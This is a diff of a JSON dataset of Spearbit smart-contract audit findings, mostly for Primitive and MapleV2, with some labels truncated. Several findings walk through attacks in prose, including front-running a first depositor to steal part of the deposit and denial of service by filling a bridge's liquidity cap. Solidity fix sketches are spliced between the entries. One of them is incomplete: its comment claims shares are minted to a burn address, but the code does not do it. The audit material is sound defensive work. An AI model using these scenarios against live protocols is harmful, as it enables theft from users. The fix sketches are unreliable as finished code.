chooses the midpoint as root = (lower + upper) / 2; and the bisection terminates if either upper - lower < 0 or maxIterations is reached. Given upper >= lower throughout the code, it's easy to see that upper - lower < 0 can never be satisfied. The bisection will always use the max iterations. However, even with an epsilon of 1 it can happen that the midpoint root is the same as the lower bound if upper = lower + 1. The if (output * lowerOutput < 0) condition will never be satisfied and the else case will always run, setting the lower bound to itself.
The bisection will keep iterating with the same lower and upper bounds until max iterations are reached.", "labels": [ "Spearbit", - "ConnextNxtp", + "Primitive", "Severity: Low Risk" ] }, { - "title": "When initializing the Connext bridge make sure the _xAppConnectionManager domain matches the one provided to the initialization function for the bridge", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The only contract that implements IConnectorManager fully is SpokeConnector (through inheriting ConnectorManager and overriding localDomain): // File: SpokeConnector.sol function localDomain() external view override returns (uint32) { return DOMAIN; } So a SpokeConnector or an IConnectorManager has its own concept of the local domain (the domain that it lives / is deployed on). And this domain is used when we are hashing messages and inserting them into the SpokeConnector's merkle tree: // File: SpokeConnector.sol bytes memory _message = Message.formatMessage( DOMAIN, bytes32(uint256(uint160(msg.sender))), _nonce, _destinationDomain, _recipientAddress, _messageBody ); // Insert the hashed message into the Merkle tree. bytes32 _messageHash = keccak256(_message); // Returns the root calculated after insertion of message, needed for events for // watchers (bytes32 _root, uint256 _count) = MERKLE.insert(_messageHash); We need to make sure that this local domain matches the _domain provided to this init function. Otherwise, the message hashes that are inserted into the SpokeConnector's merkle tree would have 2 different origin domains linked to them: one from the SpokeConnector in this message hash and one from connext's s.domain = _domain, which is used in calculating the transfer id hash. The same issue applies to setXAppConnectionManager.", + "title": "Potential reentrancy in claimFees", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The contract performs all transfers in the _settlement function and therefore _settlement can call back to the user for reentrant tokens. To avoid reentrancy issues the _preLock() modifier implements a reentrancy check, but only if the called action is not happening during a multicall execution: function _preLock() private { // Reverts if the lock was already set and the current call is not a multicall. if (_locked != 1 && !_currentMulticall) { revert InvalidReentrancy(); } _locked = 2; } Therefore, multicalls are not protected against reentrancy, and _settlement should only be executed once, at the end of the original multicall function. However, the claimFee function can be called through a multicall by the protocol owner, and it calls _settlement even if the execution is part of a multicall.", "labels": [ "Spearbit", - "ConnextNxtp", + "Primitive", "Severity: Low Risk" ] }, { - "title": "The stable swap pools used in Connext are incompatible with tokens with varying decimals", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The stable swap functionality used in Connext calculates and stores, for each token in a pool, the token's precision relative to the pool's precision. The token precision calculation uses the token's decimals. And since this precision is only set once, for a token that can have its decimals changed at a later time in the future, the precision used might not always be accurate in the future.
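A minimal sketch (assumed fix, with names taken from the claimFees finding above) of deferring settlement while inside a multicall, so that _settlement runs exactly once at the end of the outer multicall instead of inside claimFee.

```solidity
abstract contract ClaimFeeSketch {
    bool internal _currentMulticall;

    function _settlement() internal virtual;
    function _preLock() internal virtual;
    function _postLock() internal virtual;

    function claimFee(address token, uint256 amount) external {
        _preLock();
        // ... fee accounting for `token` / `amount` elided ...
        // Was: an unconditional _settlement(), reachable mid-multicall.
        if (!_currentMulticall) _settlement();
        _postLock();
    }
}
```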
And so in the event of a token decimal change, the swap calculations involving this token would be inaccurate. For example in _xp(...): function _xp(uint256[] memory balances, uint256[] memory precisionMultipliers) internal pure returns (uint256[] memory) { uint256 numTokens = balances.length; require(numTokens == precisionMultipliers.length, \"mismatch multipliers\"); uint256[] memory xp = new uint256[](numTokens); for (uint256 i; i < numTokens; ) { xp[i] = balances[i] * precisionMultipliers[i]; unchecked { ++i; } } return xp; } We are multiplying in xp[i] = balances[i] * precisionMultipliers[i]; and cannot use division for tokens that have higher precision than the pool's default precision.", + "title": "Bisection can be optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The Bisection algorithm tries to find a root of the monotonic function. Evaluating the expensive invariant function at the lower point on each iteration can be avoided by caching the output function value whenever a new lower bound is set.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Gas Optimization" ] }, { - "title": "When Connext reaches the allowed custodied cap, race conditions can be created", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "When IERC20(local).balanceOf(address(this)) is close to s.caps[key] (this can be relative/subjective) for a canonical token on its canonical domain, a race condition gets created where users might try to frontrun each other's calls to xcall or xcallIntoLocal to be included in a cross-chain transfer. This race condition is actually between all users and all liquidity routers, since the same type of check exists when routers try to add liquidity. uint256 custodied = IERC20(_local).balanceOf(address(this)) + _amount; uint256 cap = s.caps[key]; if (cap > 0 && custodied > cap) { revert RoutersFacet__addLiquidityForRouter_capReached(); }", + "title": "Pool existence check in swap should happen earlier", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The swap function makes use of the pool pair's tokens to scale the input decimals before it checks if the pool even exists.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "Prevent sequencers from signing multiple routes for the same cross-chain transfer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Liquidity routers only sign the hash of the (transferId, pathLength) combo. This means that each router does not have a say in: 1. The ordering of routers provided/signed by the sequencer. 2. What other routers are used in the sequence.
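A minimal sketch (assumed interface) combining the fixes suggested by the two bisection findings above: terminate once the interval shrinks to a single unit (the original `upper - lower < 0` check can never be true for unsigned bounds), and cache the function value at the lower bound instead of re-evaluating the expensive invariant each round.

```solidity
library BisectionSketch {
    function bisect(
        function(uint256) pure returns (int256) f, // monotonic target function
        uint256 lower,
        uint256 upper,
        uint256 maxIterations
    ) internal pure returns (uint256) {
        int256 lowerOutput = f(lower); // cached lower-bound evaluation
        for (uint256 i; i < maxIterations && upper - lower > 1; ++i) {
            uint256 mid = (lower + upper) / 2;
            int256 output = f(mid);
            if (output * lowerOutput < 0) {
                upper = mid;          // sign change: root lies in [lower, mid]
            } else {
                lower = mid;          // keep searching in [mid, upper]
                lowerOutput = output; // cache follows the new lower bound
            }
        }
        return lower;
    }
}
```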
If a sequencer signs 2 different routes (sets of routers) for a cross-chain transfer, a relayer can decide which set of routers to use and provide to BridgeFacet.execute to make sure the liquidity from a specific set of routers' balances is used (the same possibility exists if 2 different sequencers sign 2 different routes for a cross-chain transfer).", + "title": "Pool creation in test uses wrong duration and volatility", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The second path with pairId != 0 in HelperConfigsLib's pool creation calls the createPool method with the volatility and duration parameters swapped, leading to wrong pool creations used in tests that use this path.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "Well-funded malicious actors can DOS the bridge", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "A malicious actor (e.g. a well-funded cross-chain messaging competitor) can DOS the bridge cheaply. Assume an Ethereum <-> Polygon bridge and a liquidity cap set to 1m for USDC. 1. Using a slow transfer to avoid router liquidity fees, Bob (the attacker) transfers 1m USDC from Ethereum to Polygon. 1m USDC will be locked on Connext's bridge. Since the liquidity cap for USDC is filled, no one will be able to transfer any USDC from Ethereum to Polygon unless someone transfers POS-USDC from Polygon to Ethereum to reduce the amount of USDC held by the bridge. 2. On the destination chain, nextUSDC (the local bridge asset) will be swapped to POS-USDC (the adopted asset). The swap will incur low slippage because it is a stableswap. Assume that Bob will receive 999,900 POS-USDC back on Polygon. A few hundred or thousand loss is probably nothing for a determined competitor that wants to harm the reputation of Connext. 3. Bob bridges back the 999,900 POS-USDC using Polygon's native POS bridge. Bob will receive 999,900 USDC in his wallet on Ethereum after 30 minutes. It is a 1-1 exchange using a native bridge, so no loss is incurred here. 4. Whenever the liquidity cap for USDC gets reduced on Connext's bridge, Bob will repeat the same trick to keep the bridge in a locked state. 5. If Bob is well-funded enough, he could perform this against all Connext's bridges linked to other chains for popular assets (e.g. USDC), and normal users will have issues transferring popular assets when using xcall.", + "title": "First pool depositor can be front-run and have part of their deposit stolen", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The first deposit with a totalSupply of zero shares will mint shares equal to the deposited amount. This makes it possible to deposit the smallest unit of a token and profit off a rounding issue in the computation for the minted shares of the next depositor: (shares_ * totalAssets()) / totalSupply_ Example: The first depositor (victim) wants to deposit 2M USDC (2e12) and submits the transaction. The attacker front-runs the victim's transaction by calling deposit(1) to get 1 share. They then transfer 1M USDC (1e12) to the contract, such that totalAssets = 1e12 + 1, totalSupply = 1. When the victim's transaction is mined, they receive 2e12 / (1e12 + 1) * totalSupply = 1 share (rounded down from 1.9999...).
The attacker withdraws their 1 share and gets 3M USDC * 1 / 2 = 1.5M USDC, making a 0.5M profit. During the migration, an _initialSupply of shares to be airdropped is already minted at initialization and is not affected by this attack.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "MapleV2.pd", + "Severity: High Risk" ] }, { - "title": "calculateTokenAmount is not checking whether the amounts provided have the same length as balances", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "There is no check to make sure amounts.length == balances.length in calculateTokenAmount: function calculateTokenAmount( Swap storage self, uint256[] calldata amounts, bool deposit ) internal view returns (uint256) { uint256 a = _getAPrecise(self); uint256[] memory balances = self.balances; ... There are 2 bad cases: 1. amounts.length > balances.length, in this case, we have provided extra data which will be ignored silently and might cause miscalculation on or off chain. 2. amounts.length < balances.length, the loop in calculateTokenAmount would/should revert because of an index-out-of-bounds error. In this case, we might spend more gas than necessary compared to if we had performed the check and reverted early.", + "title": "Users depositing to a pool with unrealized losses will take on the losses", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The pool share price used for deposits is always totalAssets() / totalSupply, however the pool share price when redeeming is (totalAssets() - unrealizedLosses()) / totalSupply. The unrealizedLosses value is increased by loan impairments (LM.impairLoan) or when triggering a default with a liquidation (LM.triggerDefault). The totalAssets are only reduced by this value when the loss is realized in LM.removeLoanImpairment or LM.finishCollateralLiquidation. This leads to a time window where deposits use a much higher share price than current redemptions and future deposits. Users depositing to the pool during this time window are almost guaranteed to make losses when they are realized. In the worst case, a Pool.deposit might even be (accidentally) front-run by a loan impairment or liquidation.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "MapleV2.pd", + "Severity: Medium Risk" ] }, { - "title": "Rearrange an expression in _calculateSwapInv to avoid underflows", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "In the following expression used in SwapUtils._calculateSwapInv, if xp[tokenIndexFrom] = x + 1 the expression would underflow and revert. Rearranging the expression (to dx = x + 1 - xp[tokenIndexFrom];) avoids reverting in this edge case. dx = x - xp[tokenIndexFrom] + 1;", + "title": "TransitionLoanManager.add does not account for accrued interest since last call", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The TransitionLoanManager.add advances the domain start but the accrued interest since the last domain start is not accounted for. If add is called several times, the accounting will be wrong.
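Stepping back to the first-depositor finding above, a minimal sketch of a common mitigation pattern (not necessarily Maple's fix, and with assumed ERC4626-style naming): burning a small amount of "dead" shares on the first deposit makes inflating the share price via a direct token transfer prohibitively expensive.

```solidity
abstract contract FirstDepositSketch {
    uint256 internal constant DEAD_SHARES = 1e3; // hypothetical magnitude

    function totalSupply() public view virtual returns (uint256);
    function totalAssets() public view virtual returns (uint256);

    function previewDeposit(uint256 assets) public view returns (uint256) {
        uint256 supply = totalSupply();
        // First depositor forfeits DEAD_SHARES (minted to a burn address);
        // reverts for deposits below DEAD_SHARES, which also blocks deposit(1).
        if (supply == 0) return assets - DEAD_SHARES;
        return assets * supply / totalAssets();
    }
}
```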
It therefore wrongly tracks the _accountedInterest variable.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "MapleV2.pd", + "Severity: Medium Risk" ] }, { - "title": "The pre-image of DIAMOND_STORAGE_POSITION's storage slot is known", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The preimage of the hashed storage slot DIAMOND_STORAGE_POSITION is known.", + "title": "Unaccounted collateral is mishandled in triggerDefault", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The control flow of triggerDefault is partially determined by the value of MapleLoanLike(loan_).collateral() == 0. The code later assumes there are 0 collateral tokens in the loan if this value is true, which is incorrect in the case of unaccounted collateral tokens. In non-liquidating repossessions, this causes an overestimation of the number of fundsAsset tokens repossessed, leading to a revert in the _disburseLiquidationFunds function. Anyone can trigger this revert by manually transferring 1 Wei of collateralAsset to the loan itself. In liquidating repossessions, a similar issue causes the code to call the liquidator's setCollateralRemaining function with only accounted collateral, meaning unaccounted collateral will be unused/stuck in the liquidator.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "MapleV2.pd", + "Severity: Medium Risk" ] }, { - "title": "The @param NatSpec comment for _key in AssetLogic._swapAsset is incorrect", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The @param NatSpec for _key indicates that this parameter is a canonical token id, where instead it should mention that it is a hash of a canonical id and its corresponding domain. We need to make sure the correct value has been passed down to _swapAsset.", + "title": "Initial cycle time is wrong when queuing several config updates", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The initial cycle time will be wrong if there's already an upcoming config change that changes the cycle duration. Example: currentCycleId: 100 config[0] = currentConfig = {initialCycleId: 1, cycleDuration = 1 days} config[1] = {initialCycleId: 101, cycleDuration = 7 days} Now, scheduling will create a config with initialCycleId: 103 and initialCycleTime = now + 3 * 1 days, but the cycle durations for cycles (100, 101, 102) are 1 days + 7 days + 7 days.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "MapleV2.pd", + "Severity: Medium Risk" ] }, { - "title": "Malicious routers can temporarily DOS the bridge by depositing a large amount of liquidity", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Both routers and the bridge share the same liquidity cap on the Connext bridge. Assume that the liquidity cap for USDC is 1 million on Ethereum. Shortly after the Connext Amarok launch, a router adds 1 million USDC liquidity. No one would be able to perform an xcall transfer with USDC from Ethereum to other chains as it will always revert because the liquidity cap has been exceeded.
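A minimal sketch (assumed ERC4626-style naming, one possible alignment rather than the team's chosen fix) for the unrealized-losses finding above: pricing deposits against the same net-asset basis used for redemptions closes the window in which depositors buy shares at an inflated price.

```solidity
abstract contract UnrealizedLossSketch {
    function totalSupply() public view virtual returns (uint256);
    function totalAssets() public view virtual returns (uint256);
    function unrealizedLosses() public view virtual returns (uint256);

    function previewDeposit(uint256 assets) public view returns (uint256) {
        // Same basis as redemptions; assumes netAssets > 0 for a live pool.
        uint256 netAssets = totalAssets() - unrealizedLosses();
        return assets * totalSupply() / netAssets;
    }
}
```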
The DOS is temporary because the router's liquidity on Ethereum will be reduced if there is USDC liquidity flowing in the opposite direction (e.g., from Polygon to Ethereum).", + "title": "Users cannot resubmit a withdrawal request as per the wiki", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "As per Maple's wiki: pool-v2::PoolManager.sol#371-L382, withdrawalRefresh: The withdrawal request can be resubmitted with the same amount of shares by calling pool.requestRedeem(0). However, the current implementation prevents Pool.requestRedeem() from being called where the shares_ parameter is zero.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Low Risk" ] }, { - "title": "Prevent deploying a representation token twice", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function setupAsset() is protected by _enrollAdoptedAndLocalAssets(), which checks s.approvedAssets[_key] to prevent accidentally setting up an asset twice. However, the function _removeAssetId() is rather thorough and removes the s.approvedAssets[_key] flag. After a call to _removeAssetId(), an asset can be recreated via setupAsset(). This will deploy a second representation token, which will be confusing to users of Connext. Note: The function setupAssetWithDeployedRepresentation() could be used to connect a previous representation token again to the canonical token. Note: All these functions are authorized, so it would only be a problem if mistakes are made. function setupAsset(...) ... onlyOwnerOrAdmin ... { if (_canonical.domain != s.domain) { _local = _deployRepresentation(...); // deploys a new token } else { ... } bytes32 key = _enrollAdoptedAndLocalAssets(_adoptedAssetId, _local, _stableSwapPool, _canonical); ... } function _enrollAdoptedAndLocalAssets(...) ... { ... if (s.approvedAssets[_key]) revert TokenFacet__addAssetId_alreadyAdded(); s.approvedAssets[_key] = true; ... } function _removeAssetId(...) ... { ... delete s.approvedAssets[_key]; ... }", + "title": "Accrued interest may be calculated on an overstated payment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The checkTotalAssets() function is a useful helper that may be used to make business decisions in the protocol. However, if there is a late loan payment, the total interest is calculated on an incorrect payment interval, causing the accrued interest to be overstated. It is also important to note that late interest will also be excluded from the total interest calculation.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Low Risk" ] }, { - "title": "Extra safety checks in _removeAssetId()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function _removeAssetId() deletes assets but it doesn't check if the passed parameters are a consistent set. This allows for mistakes where the wrong values are accidentally deleted. function _removeAssetId(bytes32 _key, address _adoptedAssetId, address _representation) internal { ... delete s.adoptedToCanonical[_adoptedAssetId]; delete s.representationToCanonical[_representation]; ...
}", + "title": "No deadline when liquidating a borrower's collateral", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "A loan's collateral is liquidated in the event of a late payment or if the pool delegate impairs a loan If the loan contains any amount of collateral (assuming it is different to the due to insolvency by the borrower. funds' asset), the liquidation process will attempt to sell the collateral at a discounted amount. Because a liquidation is considered active as long as there is remaining collateral in the liquidator contract, a user can knowingly liquidate all but 1 wei of collateral. As there is no incentive for others to liquidate this dust amount, it is up to the loan manager to incur the cost and responsibility of liquidating this amount before they can successfully call LoanManager.finishCollateralLiquidation().", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Low Risk" ] }, { - "title": "Data length not validated", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The following functions do not validate that the input _data is 32 bytes. GnosisSpokeConnector._sendMessag GnosisSpokeConnector._processMessage BaseMultichain.sendMessage OptimismSpokeConnector._sendMessage The input _data contains the outbound Merkle root or aggregated Merkle root, which is always 32 bytes. If the root is not 32 bytes, it is invalid and should be rejected.", + "title": "Loan impairments can be unavoidably unfair for borrowers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "When a pool delegate impairs a loan, the loan's _nextPaymentDueDate will be set to the min of If the pool delegate later decides to remove the im- block.timestamp and the current _nextPaymentDueDate. pairment, the original _nextPaymentDueDate is restored to its correct value. The borrower can also remove an impairment themselves by making a payment. In this case, the _nextPaymentDueDate is not restored, which is always worse for the borrower. This can be unfair since the borrower would have to pay late interest on a loan that was never actually late (according to the original payment due date). Another related consequence is that a borrower can be liquidated before the original payment due date even passes (this is possible as long as the loan is impaired more than gracePeriod seconds away from the original due date).", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Low Risk" ] }, { - "title": "Verify timestamp reliability on L2", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Timestamp information on rollups can be less reliable than on mainnet. For instance, Arbitrum docs say: As a general rule, any timing assumptions a contract makes about block numbers and timestamps should be considered generally reliable in the longer term (i.e., on the order of at least several hours) but unreliable in the shorter term (minutes). (It so happens these are generally the same assumptions one should operate under when using block numbers directly on Ethereum!) 
Uniswap docs mention this for Optimism: The block.timestamp of these blocks, however, reflects the block.timestamp of the last L1 block ingested by the Sequencer.", + "title": "withdrawCover() vulnerable to reentrancy", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "withdrawCover() allows for reentrancy and could be abused to withdraw below the minimum cover amount and avoid having to cover protocol insolvency through a bad liquidation or loan default. The moveFunds() function could transfer the asset amount to the recipient specified by the pool delegate. Some tokens allow for callbacks before the actual transfer is made. In this case, the pool delegate could reenter the withdrawCover() function and bypass the balance check, as it is made before tokens are actually transferred. This can be repeated to empty out the required cover balance from the contract. It is noted that the PoolDelegateCover contract is a protocol controlled contract, hence the low severity.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Low Risk" ] }, { - "title": "MirrorConnector cannot be changed once set", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "For chains other than Polygon, it is allowed to change the mirror connector any number of times. For the Polygon chain, _setMirrorConnector is overridden. 1. Let's take the PolygonHubConnector contract as an example: function _setMirrorConnector(address _mirrorConnector) internal override { super._setMirrorConnector(_mirrorConnector); setFxChildTunnel(_mirrorConnector); } 2. Since setFxChildTunnel(PolygonHubConnector) can only be called once due to the below require check, this also restricts the number of times the mirror connector can be altered. function setFxChildTunnel(address _fxChildTunnel) public virtual { require(fxChildTunnel == address(0x0), \"FxBaseRootTunnel: CHILD_TUNNEL_ALREADY_SET\"); ... }", + "title": "Bad parameter encoding and deployment when using wrong initializers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The initializers used to encode the arguments, when deploying a new pool in PoolDeployer, might not be the initializers that the proxy factory will use for the default version and might lead to bad parameter encoding & deployments if a wrong initializer is passed.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Low Risk" ] }, { - "title": "Possible infinite loop in dequeueVerified()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The loop in function dequeueVerified() doesn't end if queue.first == queue.last == 0. In this situation, at unchecked { --last; } the following happens: last wraps to type(uint128).max. Now last is very large and is surely >= first, and thus the loop keeps running. This problem can occur when the queue isn't initialized. function dequeueVerified(Queue storage queue, uint256 delay) internal returns (bytes32[] memory) { uint128 first = queue.first; uint128 last = queue.last; require(last >= first, \"queue empty\"); for (last; last >= first; ) { ... unchecked { --last; } // underflows when last == 0 (e.g.
queue isn't initialized) } }", + "title": "Event LoanClosed might be emitted with the wrong value", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "In function closeLoan function, the fees are got by the getClosingPaymentBreakdown function and it is not adding refinances fees after in code are paid all fee by payServiceFees which may include refinances fees. The event LoanClose might be emitted with the wrong fee value.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Low Risk" ] }, { - "title": "Do not ignore staticcall's return value", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "TypedMemView calls several precompiles through staticcall opcode and never checks its return value assuming it is a success. For instance: TypedMemView.sol#L668-L669, TypedMemView.sol#L685-L686, // use the identity precompile to copy // guaranteed not to fail, so pop the success pop(staticcall(gas(), 4, _oldLoc, _len, _newLoc, _len)) However, there are rare cases when call to precompiles can fail. For example, when the call runs out of gas (since 63/64 of the gas is passed, the remaining execution can still have gas). Generally, not checking for success of calls is dangerous and can have unintended consequences.", + "title": "Bug in makePayment() reverts when called with small amounts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "When makePayment() is called with an amount which is less than the fees payable, then the trans- action will always revert, even if there is an adequate amount of drawable funds. The revert happens due to an underflow in getUnaccountedAmount() because the token balance is decremented on the previous line without updating drawable funds.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk TypedMemView.sol#L652," + "MapleV2.pd", + "Severity: Low Risk" ] }, { - "title": "Renounce wait time can be extended", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The _proposedOwnershipTimestamp updates everytime on calling proposeNewOwner with newlyPro- posed as zero address. This elongates the time when owner can be renounced.", + "title": "Pool.previewWithdraw always reverts but Pool.withdraw can succeed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The Pool.previewWithdraw => PM. previewWithdraw => WM.previewWithdraw function call se- quence always reverts in the WithdrawalManager. However, the Pool.withdraw function can succeed. This behavior might be unexpected, especially, as integrators call previewWithdraw before doing the actual withdraw call.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Low Risk" ] }, { - "title": "Extra parameter in function checker() at encodeWithSelector()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function checker() sets up the parameters to call the function sendMessage(). However, it adds an extra parameter outboundRoot, which isn't necessary. function sendMessage() external { ... } function checker() external view override returns (bool canExec, bytes memory execPayload) { ... execPayload = abi.encodeWithSelector(this.sendMessage.selector, outboundRoot); // extra parameter ... 
}", + "title": "Setting a new WithdrawalManager locks funds in old one", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The WithdrawalManager only accepts calls from a PoolManager. When setting a new withdrawal manager with PoolManager.setWithdrawalManager, the old one cannot be accessed anymore. Any user shares locked for withdrawal in the old one are stuck.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Low Risk" ] }, { - "title": "MerkleLib.insert() can be optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "storage. Each call to MerkleLib.insert() reads the entire tree from storage, and writes 2 (tree.count and tree.branch[i]) back to storage. These storage operations can be done only once at the beginning, by loading them in memory. The updated count and branches can be written back to the storage at the end saving expensive SSTORE and SLOAD operations.", + "title": "Use whenProtocolNotPaused on migrate() instead of upgrade() for more complete protection", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "whenProtocolNotPaused is added to migrate() for the Liquidator, MapleLoan, and Withdrawal- Manager contracts in order to protect the protocol by preventing it from upgrading while the protocol is paused. However, this protection happens only during upgrade, and not during instantiation.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Low Risk" ] }, { - "title": "EIP712 domain separator can be cached", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The domain separator can be cached for gas-optimization.", + "title": "Missing post-migration check in PoolManager.sol could result in lost funds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The protocol employs an upgradeable/migrateable system that includes upgradeable initializers for factory created contracts. For the most part, a storage value that was left uninitialized due to an erroneous initializer would not be affect protocol funds. For example forgetting to initialize _locked would cause all nonReentrant functions to revert, but no funds lost. However, if the poolDelegateCover address were unset and depositCover() were called, the funds would be lost as there is no to != address(0) check in transferFrom.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Low Risk" ] }, { - "title": "stateCommitmentChain can be made immutable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Once assigned in constructor, stateCommitmentChain cannot be changed.", + "title": "Globals.poolDelegates[delegate_].ownedPoolManager mapping can be overwritten", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The Globals.poolDelegates[delegate_].ownedPoolManager keeps track of a single pool manager for a pool delegate. 
It can happen that the same pool delegate is registered for a second pool manager and the mapping is overwritten, by calling PM.acceptPendingPoolDelegate -> Globals.transferOwnedPoolManager or Globals.activatePoolManager.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Low Risk" ] }, { - "title": "Nonce can be updated in single step", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Nonce can be incremented in a single step instead of using a second step, which will save some gas", + "title": "Pool withdrawals can be kept low by non-redeeming users", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "In the current pool design, users request to exit the pool and are scheduled for a withdrawal window in the withdrawal manager. If the pool does not have enough liquidity, their share on the available pool liquidity is proportionate to the total shares of all users who requested to withdraw in that withdrawal window. It's possible for griefers to keep the withdrawals artificially low by requesting a withdrawal but not actually withdrawing during the withdrawal window. These griefers are not penalized but their behavior leads to worse withdrawal amounts for every other honest user.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Low Risk" ] }, { - "title": "ZkSyncSpokeConnector._sendMessage encodes unnecessary data", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Augmenting the _data with the processMessage function selector 